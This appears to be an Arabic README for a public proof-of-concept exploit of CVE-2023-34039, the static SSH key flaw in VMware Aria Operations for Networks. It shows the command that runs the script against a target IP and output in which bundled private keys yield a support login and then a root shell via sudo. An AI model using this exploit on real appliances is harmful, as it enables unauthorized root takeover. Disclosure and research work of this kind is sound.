
استغلال VMware
POC لـ CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE
يمكن العثور على تحليل السبب الجذري للثغرة في مدونتي:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

لم يقم VMWare Aria Operations for Networks (vRealize Network Insight) من الإصدار 6.0 إلى 6.10 بإعادة إنشاء مفاتيح SSH للمستخدمين support و ubuntu، مما يسمح للمهاجم الذي لديه وصول SSH بالحصول على وصول إلى شل root لهذا المنتج.
تم الإبلاغ عن هذه المشكلة لـ VMWare بواسطة Harsh Jaiswal (@rootxharsh) و Rahul Maini (@iamnoooob) في ProjectDiscovery Research
لقد كتبت فقط الاستغلال، إذا كان يمكنك تسميته كذلك، لأنه في الأساس غلاف لأوامر ssh.
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~#
قم بالتحديث إلى أحدث إصدار أو خفف من المشكلة باتباع التعليمات الموجودة في Progress Advisory
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي ولتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا حيثما يُصرح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.